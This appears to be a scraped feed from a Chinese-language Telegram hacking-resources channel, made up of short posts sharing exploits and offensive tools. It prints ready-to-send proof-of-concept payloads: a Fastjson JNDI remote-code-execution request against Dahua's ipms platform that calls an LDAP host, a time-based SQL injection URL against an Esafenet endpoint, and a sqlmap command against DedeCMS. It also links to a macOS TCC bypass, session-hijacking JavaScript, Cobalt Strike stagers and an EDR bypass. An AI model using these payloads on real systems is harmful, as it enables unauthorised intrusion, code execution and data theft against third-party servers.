🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

14.5K views03:55

1:21

Media is too big

VIEW IN TELEGRAM

AWS S3 http异步缓存中毒POC

13.1K views09:38

🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

https://github.com/Zeyad-Azima/CVE-2023-26818
利用 Telegram 绕过 MacOS TCC
#github

GitHub

GitHub - Zeyad-Azima/CVE-2023-26818: CVE-2023-26818 Exploit MacOS TCC Bypass W/ Telegram

CVE-2023-26818 Exploit MacOS TCC Bypass W/ Telegram - Zeyad-Azima/CVE-2023-26818

👍1

13.9K views11:51

🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

大华智慧园区综合管理平台 ipms 远程代码执行漏洞 POC
POST /ipms/barpay/pay HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://xxxxx/Basic/TomcatEcho", "autoCommit": true}

❤1

16.7K views12:20

🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

亿塞通 update.jsp sql 注入漏洞 POC
GET http://1ip:port/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20D ELAY%20%270:0:2%27--

👍1

16.4K views12:20

🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

针对 Docker 存在的威胁漏洞进行的整理笔记
https://github.com/Antonlovesdnb/DockerDetectionNotes

GitHub

GitHub - Antonlovesdnb/DockerDetectionNotes: Some of my rough notes for Docker threat detection

Some of my rough notes for Docker threat detection - Antonlovesdnb/DockerDetectionNotes

👍4❤1

15.8K views12:20

🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

#福利 #工具
https://github.com/tonikelope/megabasterd

这玩意可以绕过mega网盘的下载限制

GitHub

GitHub - tonikelope/megabasterd: Yet another unofficial (and ugly) cross-platform MEGA downloader/uploader/streaming suite.

Yet another unofficial (and ugly) cross-platform MEGA downloader/uploader/streaming suite. - tonikelope/megabasterd

👍2❤1

16.1K views22:01

🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

Forwarded from 踹哈公寓

一个 Pwn 从 0 到 0.1 的自学指南

Assembly-Language 汇编语言
Reverse-Engineering 逆向工程
PWN Tools 分析工具
PWN You-just-got-pwned!
Reverse Tools 分析工具
Angr CTF 及其 WriteUp

链接：https://pan.quark.cn/s/7a7b26010e18

pan.quark.cn

夸克网盘分享

夸克网盘是夸克推出的一款云服务产品，功能包括云存储、高清看剧、文件在线解压、PDF一键转换等。通过夸克网盘可随时随地管理和使用照片、文档、手机资料，目前支持Android、iOS、PC、iPad。

14.9K views09:27

🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

迷茫大学生vs今日百万黑产头子

👍28🤡2❤1

17.8K views09:28

🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

会话劫持允许通过注入恶意 JavaScript 代码来劫持用户会话的工具。
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation

GitHub

GitHub - doyensec/Session-Hijacking-Visual-Exploitation: Session Hijacking Visual Exploitation

Session Hijacking Visual Exploitation. Contribute to doyensec/Session-Hijacking-Visual-Exploitation development by creating an account on GitHub.

❤1

17.4K views15:35

🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

无文件落地执行的 17 种方法。
https://github.com/RedXRanger/StageStrike

GitHub

GitHub - RedXRanger/StageStrike: Custom Cobalt Strike stagers using different methods of thread execution and memory allocation

Custom Cobalt Strike stagers using different methods of thread execution and memory allocation - RedXRanger/StageStrike

❤3👍1

15.8K views18:05

🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

DEF CON 31中提出的ContainYourself研究的POC，它滥用Windows容器框架来绕过EDR
https://github.com/deepinstinct/ContainYourself

GitHub

GitHub - deepinstinct/ContainYourself: A PoC of the ContainYourself research presented in DEFCON 31, which abuses the Windows containers…

A PoC of the ContainYourself research presented in DEFCON 31, which abuses the Windows containers framework to bypass EDRs. - deepinstinct/ContainYourself

❤1👍1

16.8K views00:07

🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥（数据看文件）

Dedecms 织梦 sql 注入 POC
DedeCMS 5.7.110 中发现了一个严重漏洞。此漏洞影响文件/uploads/tags.php 的未知代码。对参数 tag_alias 的操作会导致 sql 注入。

sqlmap.py -u "http://……/tags.php?QUERY_STRING=/alias/bbb*" -dbs --batch

👍1

17K views00:46